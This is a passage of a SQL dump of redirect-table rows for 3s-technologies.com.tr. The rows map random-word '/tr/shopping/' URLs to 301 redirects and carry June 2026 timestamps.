00:00:00',301),(74981,'https://3s-technologies.com.tr/tr/shopping/anthropomorphosis/4036651357.html',NULL,'https://3s-technologies.com.tr/shopping/anthropomorphosis/4036651357.html','',1,0,'2026-06-11 07:09:02','0000-00-00 00:00:00',301),(74982,'https://3s-technologies.com.tr/tr/shopping/infidelium/1059275444.html',NULL,'https://3s-technologies.com.tr/shopping/infidelium/1059275444.html','',1,0,'2026-06-11 07:09:05','0000-00-00 00:00:00',301),(74983,'https://3s-technologies.com.tr/tr/shopping/quinzain/636649491.html',NULL,'https://3s-technologies.com.tr/shopping/quinzain/636649491.html','',1,0,'2026-06-11 07:09:08','0000-00-00 00:00:00',301),(74984,'https://3s-technologies.com.tr/tr/shopping/ladinos/1536736661.html',NULL,'https://3s-technologies.com.tr/shopping/ladinos/1536736661.html','',1,0,'2026-06-11 07:09:16','0000-00-00 00:00:00',301),(74985,'https://3s-technologies.com.tr/tr/shopping/mothen/1351477622.html',NULL,'https://3s-technologies.com.tr/shopping/mothen/1351477622.html','',1,0,'2026-06-11 07:09:21','0000-00-00 00:00:00',301),(74986,'https://3s-technologies.com.tr/tr/shopping/argot/4039075539.html',NULL,'https://3s-technologies.com.tr/shopping/argot/4039075539.html','',1,0,'2026-06-11 07:09:24','0000-00-00 00:00:00',301),(74987,'https://3s-technologies.com.tr/tr/shopping/boanerges/3765005794.html',NULL,'https://3s-technologies.com.tr/shopping/boanerges/3765005794.html','',1,0,'2026-06-11 07:09:27','0000-00-00 00:00:00',301),(74988,'https://3s-technologies.com.tr/tr/shopping/paradoxure/2070256094.html',NULL,'https://3s-technologies.com.tr/shopping/paradoxure/2070256094.html','',1,0,'2026-06-11 07:09:30','0000-00-00 00:00:00',301),(74989,'https://3s-technologies.com.tr/tr/shopping/ganglion/3623201635.html',NULL,'https://3s-technologies.com.tr/shopping/ganglion/3623201635.html','',1,0,'2026-06-11 07:09:33','0000-00-00 00:00:00',301),(74990,'https://3s-technologies.com.tr/tr/shopping/easefulness/879678510.html',NULL,'https://3s-technologies.com.tr/shopping/easefulness/879678510.html','',1,0,'2026-06-11 07:09:36','0000-00-00 00:00:00',301),(74991,'https://3s-technologies.com.tr/tr/shopping/sulphantimonic/918533764.html',NULL,'https://3s-technologies.com.tr/shopping/sulphantimonic/918533764.html','',1,0,'2026-06-11 07:09:39','0000-00-00 00:00:00',301),(74992,'https://3s-technologies.com.tr/tr/shopping/articulator/2078814354.html',NULL,'https://3s-technologies.com.tr/shopping/articulator/2078814354.html','',1,0,'2026-06-11 07:09:42','0000-00-00 00:00:00',301),(74993,'https://3s-technologies.com.tr/tr/shopping/homeostatic/2007427423.html',NULL,'https://3s-technologies.com.tr/shopping/homeostatic/2007427423.html','',1,0,'2026-06-11 07:09:45','0000-00-00 00:00:00',301),(74994,'https://3s-technologies.com.tr/tr/shopping/palomino/3339687897.html',NULL,'https://3s-technologies.com.tr/shopping/palomino/3339687897.html','',1,0,'2026-06-11 07:09:54','0000-00-00 00:00:00',301),(74995,'https://3s-technologies.com.tr/tr/shopping/waldenses/1875302958.html',NULL,'https://3s-technologies.com.tr/shopping/waldenses/1875302958.html','',1,0,'2026-06-11 07:09:57','0000-00-00 00:00:00',301),(74996,'https://3s-technologies.com.tr/tr/shopping/poephila/3429203667.html',NULL,'https://3s-technologies.com.tr/shopping/poephila/3429203667.html','',1,0,'2026-06-11 07:10:00','0000-00-00 00:00:00',301),(74997,'https://3s-technologies.com.tr/tr/shopping/destruie/4038604408.html',NULL,'https://3s-technologies.com.tr/shopping/destruie/4038604408.html','',1,0,'2026-06-11 07:10:03','0000-00-00 00:00:00',301),(74998,'https://3s-technologies.com.tr/tr/shopping/dermopterygii/3158902719.html',NULL,'https://3s-technologies.com.tr/shopping/dermopterygii/3158902719.html','',1,0,'2026-06-11 07:10:06','0000-00-00 00:00:00',301),(74999,'https://3s-technologies.com.tr/tr/shopping/unintentional/2236292234.html',NULL,'https://3s-technologies.com.tr/shopping/unintentional/2236292234.html','',1,0,'2026-06-11 07:10:09','0000-00-00 00:00:00',301),(75000,'https://3s-technologies.com.tr/tr/shopping/tricarbimide/2129616724.html',NULL,'https://3s-technologies.com.tr/shopping/tricarbimide/2129616724.html','',1,0,'2026-06-11 07:10:12','0000-00-00 00:00:00',301),(75001,'https://3s-technologies.com.tr/tr/shopping/rheumy/1640744094.html',NULL,'https://3s-technologies.com.tr/shopping/rheumy/1640744094.html','',1,0,'2026-06-11 07:10:15','0000-00-00 00:00:00',301),(75002,'https://3s-technologies.com.tr/tr/shopping/territories/4185618106.html',NULL,'https://3s-technologies.com.tr/shopping/territories/4185618106.html','',1,0,'2026-06-11 07:10:18','0000-00-00 00:00:00',301),(75003,'https://3s-technologies.com.tr/tr/shopping/sforzato/3769818750.html',NULL,'https://3s-technologies.com.tr/shopping/sforzato/3769818750.html','',1,0,'2026-06-11 07:10:21','0000-00-00 00:00:00',301),(75004,'https://3s-technologies.com.tr/tr/shopping/elocutive/224865768.html',NULL,'https://3s-technologies.com.tr/shopping/elocutive/224865768.html','',1,0,'2026-06-11 07:10:24','0000-00-00 00:00:00',301),(75005,'https://3s-technologies.com.tr/tr/shopping/latticelike/3491136330.html',NULL,'https://3s-technologies.com.tr/shopping/latticelike/3491136330.html','',1,0,'2026-06-11 07:10:27','0000-00-00 00:00:00',301),(75006,'https://3s-technologies.com.tr/tr/shopping/unreputable/662055408.html',NULL,'https://3s-technologies.com.tr/shopping/unreputable/662055408.html','',1,0,'2026-06-11 07:10:30','0000-00-00 00:00:00',301),(75007,'https://3s-technologies.com.tr/tr/shopping/mammee/2227150114.html',NULL,'https://3s-technologies.com.tr/shopping/mammee/2227150114.html','',1,0,'2026-06-11 07:10:34','0000-00-00 00:00:00',301),(75008,'https://3s-technologies.com.tr/tr/shopping/stoppage/3411702627.html',NULL,'https://3s-technologies.com.tr/shopping/stoppage/3411702627.html','',1,0,'2026-06-11 07:10:36','0000-00-00 00:00:00',301),(75009,'https://3s-technologies.com.tr/tr/shopping/aeroclub/364901936.html',NULL,'https://3s-technologies.com.tr/shopping/aeroclub/364901936.html','',1,0,'2026-06-11 07:10:41','0000-00-00 00:00:00',301),(75010,'https://3s-technologies.com.tr/tr/shopping/oxgang/2038746969.html',NULL,'https://3s-technologies.com.tr/shopping/oxgang/2038746969.html','',1,0,'2026-06-11 07:10:43','0000-00-00 00:00:00',301),(75011,'https://3s-technologies.com.tr/tr/shopping/radiolarian/2541130514.html',NULL,'https://3s-technologies.com.tr/shopping/radiolarian/2541130514.html','',1,0,'2026-06-11 07:10:46','0000-00-00 00:00:00',301),(75012,'https://3s-technologies.com.tr/tr/shopping/zolaism/2803234649.html',NULL,'https://3s-technologies.com.tr/shopping/zolaism/2803234649.html','',1,0,'2026-06-11 07:10:49','0000-00-00 00:00:00',301),(75013,'https://3s-technologies.com.tr/tr/shopping/unbaned/1929847573.html',NULL,'https://3s-technologies.com.tr/shopping/unbaned/1929847573.html','',1,0,'2026-06-11 07:10:52','0000-00-00 00:00:00',301),(75014,'https://3s-technologies.com.tr/tr/shopping/douzepere/919649794.html',NULL,'https://3s-technologies.com.tr/shopping/douzepere/919649794.html','',1,0,'2026-06-11 07:10:55','0000-00-00 00:00:00',301),(75015,'https://3s-technologies.com.tr/tr/shopping/pronota/2377232893.html',NULL,'https://3s-technologies.com.tr/shopping/pronota/2377232893.html','',1,0,'2026-06-11 07:10:58','0000-00-00 00:00:00',301),(75016,'https://3s-technologies.com.tr/tr/shopping/worshipped/2515646460.html',NULL,'https://3s-technologies.com.tr/shopping/worshipped/2515646460.html','',1,0,'2026-06-11 07:11:01','0000-00-00 00:00:00',301),(75017,'https://3s-technologies.com.tr/tr/shopping/mispronounced/3407113855.html',NULL,'https://3s-technologies.com.tr/shopping/mispronounced/3407113855.html','',1,0,'2026-06-11 07:11:04','0000-00-00 00:00:00',301),(75018,'https://3s-technologies.com.tr/tr/shopping/mizzenmast/3977886537.html',NULL,'https://3s-technologies.com.tr/shopping/mizzenmast/3977886537.html','',1,0,'2026-06-11 07:11:07','0000-00-00 00:00:00',301),(75019,'https://3s-technologies.com.tr/tr/shopping/propterygial/369070835.html',NULL,'https://3s-technologies.com.tr/shopping/propterygial/369070835.html','',1,0,'2026-06-11 07:11:15','0000-00-00 00:00:00',301),(75020,'https://3s-technologies.com.tr/tr/shopping/rosacic/2633333263.html',NULL,'https://3s-technologies.com.tr/shopping/rosacic/2633333263.html','',1,0,'2026-06-11 07:11:18','0000-00-00 00:00:00',301),(75021,'https://3s-technologies.com.tr/tr/shopping/pretorium/1679130997.html',NULL,'https://3s-technologies.com.tr/shopping/pretorium/1679130997.html','',1,0,'2026-06-11 07:11:22','0000-00-00 00:00:00',301),(75022,'https://3s-technologies.com.tr/tr/shopping/bellow/1435939357.html',NULL,'https://3s-technologies.com.tr/shopping/bellow/1435939357.html','',1,0,'2026-06-11 07:11:25','0000-00-00 00:00:00',301),(75023,'https://3s-technologies.com.tr/tr/shopping/zoographic/1459258805.html',NULL,'https://3s-technologies.com.tr/shopping/zoographic/1459258805.html','',1,0,'2026-06-11 07:11:27','0000-00-00 00:00:00',301),(75024,'https://3s-technologies.com.tr/tr/shopping/goniocidaris/1891251911.html',NULL,'https://3s-technologies.com.tr/shopping/goniocidaris/1891251911.html','',1,0,'2026-06-11 07:11:38','0000-00-00 00:00:00',301),(75025,'https://3s-technologies.com.tr/tr/shopping/naturist/1350386349.html',NULL,'https://3s-technologies.com.tr/shopping/naturist/1350386349.html','',1,0,'2026-06-11 07:11:42','0000-00-00 00:00:00',301),(75026,'https://3s-technologies.com.tr/tr/shopping/niellist/3803861048.html',NULL,'https://3s-technologies.com.tr/shopping/niellist/3803861048.html','',1,0,'2026-06-11 07:11:45','0000-00-00 00:00:00',301),(75027,'https://3s-technologies.com.tr/tr/shopping/weathergaw/2488181818.html',NULL,'https://3s-technologies.com.tr/shopping/weathergaw/2488181818.html','',1,0,'2026-06-11 07:11:48','0000-00-00 00:00:00',301),(75028,'https://3s-technologies.com.tr/tr/shopping/betelgeuse/2007951062.html',NULL,'https://3s-technologies.com.tr/shopping/betelgeuse/2007951062.html','',1,0,'2026-06-11 07:11:51','0000-00-00 00:00:00',301),(75029,'https://3s-technologies.com.tr/tr/shopping/trumpeted/113000169.html',NULL,'https://3s-technologies.com.tr/shopping/trumpeted/113000169.html','',1,0,'2026-06-11 07:11:54','0000-00-00 00:00:00',301),(75030,'https://3s-technologies.com.tr/tr/shopping/platycercys/1587702570.html',NULL,'https://3s-technologies.com.tr/shopping/platycercys/1587702570.html','',1,0,'2026-06-11 07:11:57','0000-00-00 00:00:00',301),(75031,'https://3s-technologies.com.tr/tr/shopping/hairbrained/3649674507.html',NULL,'https://3s-technologies.com.tr/shopping/hairbrained/3649674507.html','',1,0,'2026-06-11 07:12:00','0000-00-00 00:00:00',301),(75032,'https://3s-technologies.com.tr/tr/shopping/sayornis/2763426888.html',NULL,'https://3s-technologies.com.tr/shopping/sayornis/2763426888.html','',1,0,'2026-06-11 07:12:03','0000-00-00 00:00:00',301),(75033,'https://3s-technologies.com.tr/tr/shopping/stipites/282209659.html',NULL,'https://3s-technologies.com.tr/shopping/stipites/282209659.html','',1,0,'2026-06-11 07:12:06','0000-00-00 00:00:00',301),(75034,'https://3s-technologies.com.tr/tr/shopping/swarthiness/2036582395.html',NULL,'https://3s-technologies.com.tr/shopping/swarthiness/2036582395.html','',1,0,'2026-06-11 07:12:09','0000-00-00 00:00:00',301),(75035,'https://3s-technologies.com.tr/tr/shopping/harumscarum/3073867076.html',NULL,'https://3s-technologies.com.tr/shopping/harumscarum/3073867076.html','',1,0,'2026-06-11 07:12:12','0000-00-00 00:00:00',301),(75036,'https://3s-technologies.com.tr/tr/shopping/swellfishes/3123230136.html',NULL,'https://3s-technologies.com.tr/shopping/swellfishes/3123230136.html','',1,0,'2026-06-11 07:12:15','0000-00-00 00:00:00',301),(75037,'https://3s-technologies.com.tr/tr/shopping/hydrencephsloid/1413486634.html',NULL,'https://3s-technologies.com.tr/shopping/hydrencephsloid/1413486634.html','',1,0,'2026-06-11 07:12:20','0000-00-00 00:00:00',301),(75038,'https://3s-technologies.com.tr/tr/shopping/recension/269630669.html',NULL,'https://3s-technologies.com.tr/shopping/recension/269630669.html','',1,0,'2026-06-11 07:12:22','0000-00-00 00:00:00',301),(75039,'https://3s-technologies.com.tr/tr/shopping/straightest/2309099190.html',NULL,'https://3s-technologies.com.tr/shopping/straightest/2309099190.html','',1,0,'2026-06-11 07:12:25','0000-00-00 00:00:00',301),(75040,'https://3s-technologies.com.tr/tr/shopping/swellish/763393846.html',NULL,'https://3s-technologies.com.tr/shopping/swellish/763393846.html','',1,0,'2026-06-11 07:12:28','0000-00-00 00:00:00',301),(75041,'https://3s-technologies.com.tr/tr/shopping/mycelium/1336381044.html',NULL,'https://3s-technologies.com.tr/shopping/mycelium/1336381044.html','',1,0,'2026-06-11 07:12:31','0000-00-00 00:00:00',301),(75042,'https://3s-technologies.com.tr/tr/shopping/rising/4269946864.html',NULL,'https://3s-technologies.com.tr/shopping/rising/4269946864.html','',1,0,'2026-06-11 07:12:39','0000-00-00 00:00:00',301),(75043,'https://3s-technologies.com.tr/tr/shopping/starchwort/3393322766.html',NULL,'https://3s-technologies.com.tr/shopping/starchwort/3393322766.html','',1,0,'2026-06-11 07:12:42','0000-00-00 00:00:00',301),(75044,'https://3s-technologies.com.tr/tr/shopping/discoverer/2591285784.html',NULL,'https://3s-technologies.com.tr/shopping/discoverer/2591285784.html','',1,0,'2026-06-11 07:12:45','0000-00-00 00:00:00',301),(75045,'https://3s-technologies.com.tr/tr/shopping/disple/2218111320.html',NULL,'https://3s-technologies.com.tr/shopping/disple/2218111320.html','',1,0,'2026-06-11 07:12:47','0000-00-00 00:00:00',301),(75046,'https://3s-technologies.com.tr/tr/shopping/biliferous/772523815.html',NULL,'https://3s-technologies.com.tr/shopping/biliferous/772523815.html','',1,0,'2026-06-11 07:12:53','0000-00-00 00:00:00',301),(75047,'https://3s-technologies.com.tr/tr/shopping/blacklead/4059931730.html',NULL,'https://3s-technologies.com.tr/shopping/blacklead/4059931730.html','',1,0,'2026-06-11 07:12:55','0000-00-00 00:00:00',301),(75048,'https://3s-technologies.com.tr/tr/shopping/gillian/1757007275.html',NULL,'https://3s-technologies.com.tr/shopping/gillian/1757007275.html','',1,0,'2026-06-11 07:12:58','0000-00-00 00:00:00',301),(75049,'https://3s-technologies.com.tr/tr/shopping/slyboots/2354100705.html',NULL,'https://3s-technologies.com.tr/shopping/slyboots/2354100705.html','',1,0,'2026-06-11 07:13:01','0000-00-00 00:00:00',301),(75050,'https://3s-technologies.com.tr/tr/shopping/georgia/913342806.html',NULL,'https://3s-technologies.com.tr/shopping/georgia/913342806.html','',1,0,'2026-06-11 07:13:04','0000-00-00 00:00:00',301),(75051,'https://3s-technologies.com.tr/tr/shopping/enhydros/1521993081.html',NULL,'https://3s-technologies.com.tr/shopping/enhydros/1521993081.html','',1,0,'2026-06-11 07:13:25','0000-00-00 00:00:00',301),(75052,'https://3s-technologies.com.tr/tr/shopping/humus/2666965075.html',NULL,'https://3s-technologies.com.tr/shopping/humus/2666965075.html','',1,0,'2026-06-11 07:13:28','0000-00-00 00:00:00',301),(75053,'https://3s-technologies.com.tr/tr/shopping/launcher/2775561296.html',NULL,'https://3s-technologies.com.tr/shopping/launcher/2775561296.html','',1,0,'2026-06-11 07:13:31','0000-00-00 00:00:00',301),(75054,'https://3s-technologies.com.tr/tr/shopping/stomatopod/64991076.html',NULL,'https://3s-technologies.com.tr/shopping/stomatopod/64991076.html','',1,0,'2026-06-11 07:13:33','0000-00-00 00:00:00',301),(75055,'https://3s-technologies.com.tr/tr/shopping/entimus/417221796.html',NULL,'https://3s-technologies.com.tr/shopping/entimus/417221796.html','',1,0,'2026-06-11 07:13:37','0000-00-00 00:00:00',301),(75056,'https://3s-technologies.com.tr/tr/shopping/guerdon/269467130.html',NULL,'https://3s-technologies.com.tr/shopping/guerdon/269467130.html','',1,0,'2026-06-11 07:13:45','0000-00-00 00:00:00',301),(75057,'https://3s-technologies.com.tr/tr/shopping/absolutistic/540123412.html',NULL,'https://3s-technologies.com.tr/shopping/absolutistic/540123412.html','',1,0,'2026-06-11 07:13:49','0000-00-00 00:00:00',301),(75058,'https://3s-technologies.com.tr/tr/shopping/etymology/3132151378.html',NULL,'https://3s-technologies.com.tr/shopping/etymology/3132151378.html','',1,0,'2026-06-11 07:13:52','0000-00-00 00:00:00',301),(75059,'https://3s-technologies.com.tr/tr/shopping/inusitate/2281798087.html',NULL,'https://3s-technologies.com.tr/shopping/inusitate/2281798087.html','',1,0,'2026-06-11 07:13:55','0000-00-00 00:00:00',301),(75060,'https://3s-technologies.com.tr/tr/shopping/strongylus/1913891894.html',NULL,'https://3s-technologies.com.tr/shopping/strongylus/1913891894.html','',1,0,'2026-06-11 07:13:58','0000-00-00 00:00:00',301),(75061,'https://3s-technologies.com.tr/tr/shopping/entoplastron/804577245.html',NULL,'https://3s-technologies.com.tr/shopping/entoplastron/804577245.html','',1,0,'2026-06-11 07:14:04','0000-00-00 00:00:00',301),(75062,'https://3s-technologies.com.tr/tr/shopping/inasmuch/2381238285.html',NULL,'https://3s-technologies.com.tr/shopping/inasmuch/2381238285.html','',1,0,'2026-06-11 07:14:07','0000-00-00 00:00:00',301),(75063,'https://3s-technologies.com.tr/tr/shopping/superstitiously/2661000665.html',NULL,'https://3s-technologies.com.tr/shopping/superstitiously/2661000665.html','',1,0,'2026-06-11 07:14:10','0000-00-00 00:00:00',301),(75064,'https://3s-technologies.com.tr/tr/shopping/diaphanously/3094344684.html',NULL,'https://3s-technologies.com.tr/shopping/diaphanously/3094344684.html','',1,0,'2026-06-11 07:14:13','0000-00-00 00:00:00',301),(75065,'https://3s-technologies.com.tr/tr/shopping/abortionist/2358689477.html',NULL,'https://3s-technologies.com.tr/shopping/abortionist/2358689477.html','',1,0,'2026-06-11 07:14:16','0000-00-00 00:00:00',301),(75066,'https://3s-technologies.com.tr/tr/shopping/elusiveness/3420623869.html',NULL,'https://3s-technologies.com.tr/shopping/elusiveness/3420623869.html','',1,0,'2026-06-11 07:14:23','0000-00-00 00:00:00',301),(75067,'https://3s-technologies.com.tr/tr/shopping/cymba/3963142973.html',NULL,'https://3s-technologies.com.tr/shopping/cymba/3963142973.html','',1,0,'2026-06-11 07:14:27','0000-00-00 00:00:00',301),(75068,'https://3s-technologies.com.tr/tr/shopping/porcelain/1761596063.html',NULL,'https://3s-technologies.com.tr/shopping/porcelain/1761596063.html','',1,0,'2026-06-11 07:14:30','0000-00-00 00:00:00',301),(75069,'https://3s-technologies.com.tr/tr/shopping/bushfighter/727522332.html',NULL,'https://3s-technologies.com.tr/shopping/bushfighter/727522332.html','',1,0,'2026-06-11 07:14:33','0000-00-00 00:00:00',301),(75070,'https://3s-technologies.com.tr/tr/shopping/tiddlywinks/1558817118.html',NULL,'https://3s-technologies.com.tr/shopping/tiddlywinks/1558817118.html','',1,0,'2026-06-11 07:14:39','0000-00-00 00:00:00',301),(75071,'https://3s-technologies.com.tr/tr/shopping/youpon/3665167292.html',NULL,'https://3s-technologies.com.tr/shopping/youpon/3665167292.html','',1,0,'2026-06-11 07:14:41','0000-00-00 00:00:00',301),(75072,'https://3s-technologies.com.tr/tr/shopping/ricinolein/3463297239.html',NULL,'https://3s-technologies.com.tr/shopping/ricinolein/3463297239.html','',1,0,'2026-06-11 07:14:44','0000-00-00 00:00:00',301),(75073,'https://3s-technologies.com.tr/tr/shopping/asturian/3370099387.html',NULL,'https://3s-technologies.com.tr/shopping/asturian/3370099387.html','',1,0,'2026-06-11 07:14:47','0000-00-00 00:00:00',301),(75074,'https://3s-technologies.com.tr/tr/shopping/twolipped/3233061442.html',NULL,'https://3s-technologies.com.tr/shopping/twolipped/3233061442.html','',1,0,'2026-06-11 07:14:52','0000-00-00 00:00:00',301),(75075,'https://3s-technologies.com.tr/tr/shopping/encrinus/493064626.html',NULL,'https://3s-technologies.com.tr/shopping/encrinus/493064626.html','',1,0,'2026-06-11 07:14:55','0000-00-00 00:00:00',301),(75076,'https://3s-technologies.com.tr/tr/shopping/parmaphorus/4024287411.html',NULL,'https://3s-technologies.com.tr/shopping/parmaphorus/4024287411.html','',1,0,'2026-06-11 07:14:58','0000-00-00 00:00:00',301),(75077,'https://3s-technologies.com.tr/tr/shopping/handselled/1672984784.html',NULL,'https://3s-technologies.com.tr/shopping/handselled/1672984784.html','',1,0,'2026-06-11 07:15:01','0000-00-00 00:00:00',301),(75078,'https://3s-technologies.com.tr/tr/shopping/stunted/2428436739.html',NULL,'https://3s-technologies.com.tr/shopping/stunted/2428436739.html','',1,0,'2026-06-11 07:15:16','0000-00-00 00:00:00',301),(75079,'https://3s-technologies.com.tr/tr/shopping/sorites/2024003405.html',NULL,'https://3s-technologies.com.tr/shopping/sorites/2024003405.html','',1,0,'2026-06-11 07:15:20','0000-00-00 00:00:00',301),(75080,'https://3s-technologies.com.tr/tr/shopping/toboggan/1968675935.html',NULL,'https://3s-technologies.com.tr/shopping/toboggan/1968675935.html','',1,0,'2026-06-11 07:15:23','0000-00-00 00:00:00',301),(75081,'https://3s-technologies.com.tr/tr/shopping/crocin/1796815036.html',NULL,'https://3s-technologies.com.tr/shopping/crocin/1796815036.html','',1,0,'2026-06-11 07:15:26','0000-00-00 00:00:00',301),(75082,'https://3s-technologies.com.tr/tr/shopping/homageable/2141914655.html',NULL,'https://3s-technologies.com.tr/shopping/homageable/2141914655.html','',1,0,'2026-06-11 07:15:35','0000-00-00 00:00:00',301),(75083,'https://3s-technologies.com.tr/tr/shopping/lankiness/1043156258.html',NULL,'https://3s-technologies.com.tr/shopping/lankiness/1043156258.html','',1,0,'2026-06-11 07:15:37','0000-00-00 00:00:00',301),(75084,'https://3s-technologies.com.tr/tr/shopping/stafette/3444730086.html',NULL,'https://3s-technologies.com.tr/shopping/stafette/3444730086.html','',1,0,'2026-06-11 07:15:40','0000-00-00 00:00:00',301),(75085,'https://3s-technologies.com.tr/tr/shopping/bulbosa/1848993028.html',NULL,'https://3s-technologies.com.tr/shopping/bulbosa/1848993028.html','',1,0,'2026-06-11 07:15:43','0000-00-00 00:00:00',301),(75086,'https://3s-technologies.com.tr/tr/shopping/monazite/3880072973.html',NULL,'https://3s-technologies.com.tr/shopping/monazite/3880072973.html','',1,0,'2026-06-11 07:16:03','0000-00-00 00:00:00',301),(75087,'https://3s-technologies.com.tr/tr/shopping/hypophyllous/2615999182.html',NULL,'https://3s-technologies.com.tr/shopping/hypophyllous/2615999182.html','',1,0,'2026-06-11 07:16:07','0000-00-00 00:00:00',301),(75088,'https://3s-technologies.com.tr/tr/shopping/oligomer/3412494853.html',NULL,'https://3s-technologies.com.tr/shopping/oligomer/3412494853.html','',1,0,'2026-06-11 07:16:10','0000-00-00 00:00:00',301),(75089,'https://3s-technologies.com.tr/tr/shopping/shadiest/2110466191.html',NULL,'https://3s-technologies.com.tr/shopping/shadiest/2110466191.html','',1,0,'2026-06-11 07:16:13','0000-00-00 00:00:00',301),(75090,'https://3s-technologies.com.tr/tr/shopping/shimmy/838845910.html',NULL,'https://3s-technologies.com.tr/shopping/shimmy/838845910.html','',1,0,'2026-06-11 07:16:19','0000-00-00 00:00:00',301),(75091,'https://3s-technologies.com.tr/tr/shopping/frutage/3058700381.html',NULL,'https://3s-technologies.com.tr/shopping/frutage/3058700381.html','',1,0,'2026-06-11 07:16:22','0000-00-00 00:00:00',301),(75092,'https://3s-technologies.com.tr/tr/shopping/selachian/845811289.html',NULL,'https://3s-technologies.com.tr/shopping/selachian/845811289.html','',1,0,'2026-06-11 07:16:25','0000-00-00 00:00:00',301),(75093,'https://3s-technologies.com.tr/tr/shopping/surmulletus/2572555108.html',NULL,'https://3s-technologies.com.tr/shopping/surmulletus/2572555108.html','',1,0,'2026-06-11 07:16:28','0000-00-00 00:00:00',301),(75094,'https://3s-technologies.com.tr/tr/shopping/hummeler/3614428610.html',NULL,'https://3s-technologies.com.tr/shopping/hummeler/3614428610.html','',1,0,'2026-06-11 07:16:35','0000-00-00 00:00:00',301),(75095,'https://3s-technologies.com.tr/tr/shopping/flocculent/3372427500.html',NULL,'https://3s-technologies.com.tr/shopping/flocculent/3372427500.html','',1,0,'2026-06-11 07:16:38','0000-00-00 00:00:00',301),(75096,'https://3s-technologies.com.tr/tr/shopping/enrolment/3607415608.html',NULL,'https://3s-technologies.com.tr/shopping/enrolment/3607415608.html','',1,0,'2026-06-11 07:16:41','0000-00-00 00:00:00',301),(75097,'https://3s-technologies.com.tr/tr/shopping/rockweed/2248577998.html',NULL,'https://3s-technologies.com.tr/shopping/rockweed/2248577998.html','',1,0,'2026-06-11 07:16:44','0000-00-00 00:00:00',301),(75098,'https://3s-technologies.com.tr/tr/shopping/tergiversate/2821547651.html',NULL,'https://3s-technologies.com.tr/shopping/tergiversate/2821547651.html','',1,0,'2026-06-11 07:16:49','0000-00-00 00:00:00',301),(75099,'https://3s-technologies.com.tr/tr/shopping/ruralize/1548263920.html',NULL,'https://3s-technologies.com.tr/shopping/ruralize/1548263920.html','',1,0,'2026-06-11 07:16:52','0000-00-00 00:00:00',301),(75100,'https://3s-technologies.com.tr/tr/shopping/cadmiam/1634129498.html',NULL,'https://3s-technologies.com.tr/shopping/cadmiam/1634129498.html','',1,0,'2026-06-11 07:16:54','0000-00-00 00:00:00',301),(75101,'https://3s-technologies.com.tr/tr/shopping/savants/1675149374.html',NULL,'https://3s-technologies.com.tr/shopping/savants/1675149374.html','',1,0,'2026-06-11 07:16:57','0000-00-00 00:00:00',301),(75102,'https://3s-technologies.com.tr/tr/shopping/cowherb/412633024.html',NULL,'https://3s-technologies.com.tr/shopping/cowherb/412633024.html','',1,0,'2026-06-11 07:17:11','0000-00-00 00:00:00',301),(75103,'https://3s-technologies.com.tr/tr/shopping/ashame/2697457807.html',NULL,'https://3s-technologies.com.tr/shopping/ashame/2697457807.html','',1,0,'2026-06-11 07:17:13','0000-00-00 00:00:00',301),(75104,'https://3s-technologies.com.tr/tr/shopping/proscolices/3681915197.html',NULL,'https://3s-technologies.com.tr/shopping/proscolices/3681915197.html','',1,0,'2026-06-11 07:17:16','0000-00-00 00:00:00',301),(75105,'https://3s-technologies.com.tr/tr/shopping/salimetry/2815369057.html',NULL,'https://3s-technologies.com.tr/shopping/salimetry/2815369057.html','',1,0,'2026-06-11 07:17:19','0000-00-00 00:00:00',301),(75106,'https://3s-technologies.com.tr/tr/shopping/quiescence/2274666986.html',NULL,'https://3s-technologies.com.tr/shopping/quiescence/2274666986.html','',1,0,'2026-06-11 07:17:24','0000-00-00 00:00:00',301),(75107,'https://3s-technologies.com.tr/tr/shopping/virtuosoship/3495305261.html',NULL,'https://3s-technologies.com.tr/shopping/virtuosoship/3495305261.html','',1,0,'2026-06-11 07:17:27','0000-00-00 00:00:00',301),(75108,'https://3s-technologies.com.tr/tr/shopping/jimmies/3766750511.html',NULL,'https://3s-technologies.com.tr/shopping/jimmies/3766750511.html','',1,0,'2026-06-11 07:17:30','0000-00-00 00:00:00',301),(75109,'https://3s-technologies.com.tr/tr/shopping/headland/2868531937.html',NULL,'https://3s-technologies.com.tr/shopping/headland/2868531937.html','',1,0,'2026-06-11 07:17:33','0000-00-00 00:00:00',301),(75110,'https://3s-technologies.com.tr/tr/shopping/damnation/2552430530.html',NULL,'https://3s-technologies.com.tr/shopping/damnation/2552430530.html','',1,0,'2026-06-11 07:17:58','0000-00-00 00:00:00',301),(75111,'https://3s-technologies.com.tr/tr/shopping/gentilefalcon/295556134.html',NULL,'https://3s-technologies.com.tr/shopping/gentilefalcon/295556134.html','',1,0,'2026-06-11 07:18:00','0000-00-00 00:00:00',301),(75112,'https://3s-technologies.com.tr/tr/shopping/foxtrot/3078988498.html',NULL,'https://3s-technologies.com.tr/shopping/foxtrot/3078988498.html','',1,0,'2026-06-11 07:18:03','0000-00-00 00:00:00',301),(75113,'https://3s-technologies.com.tr/tr/shopping/urocele/776064043.html',NULL,'https://3s-technologies.com.tr/shopping/urocele/776064043.html','',1,0,'2026-06-11 07:18:06','0000-00-00 00:00:00',301),(75114,'https://3s-technologies.com.tr/tr/shopping/iniquous/2900767170.html',NULL,'https://3s-technologies.com.tr/shopping/iniquous/2900767170.html','',1,0,'2026-06-11 07:18:14','0000-00-00 00:00:00',301),(75115,'https://3s-technologies.com.tr/tr/shopping/alveolar/3293435208.html',NULL,'https://3s-technologies.com.tr/shopping/alveolar/3293435208.html','',1,0,'2026-06-11 07:18:17','0000-00-00 00:00:00',301),(75116,'https://3s-technologies.com.tr/tr/shopping/cordata/1828097778.html',NULL,'https://3s-technologies.com.tr/shopping/cordata/1828097778.html','',1,0,'2026-06-11 07:18:20','0000-00-00 00:00:00',301),(75117,'https://3s-technologies.com.tr/tr/shopping/languish/687714571.html',NULL,'https://3s-technologies.com.tr/shopping/languish/687714571.html','',1,0,'2026-06-11 07:18:23','0000-00-00 00:00:00',301),(75118,'https://3s-technologies.com.tr/tr/shopping/morwening/995730561.html',NULL,'https://3s-technologies.com.tr/shopping/morwening/995730561.html','',1,0,'2026-06-11 07:18:28','0000-00-00 00:00:00',301),(75119,'https://3s-technologies.com.tr/tr/shopping/lunarian/180855867.html',NULL,'https://3s-technologies.com.tr/shopping/lunarian/180855867.html','',1,0,'2026-06-11 07:18:30','0000-00-00 00:00:00',301),(75120,'https://3s-technologies.com.tr/tr/shopping/fulgar/1882049610.html',NULL,'https://3s-technologies.com.tr/shopping/fulgar/1882049610.html','',1,0,'2026-06-11 07:18:33','0000-00-00 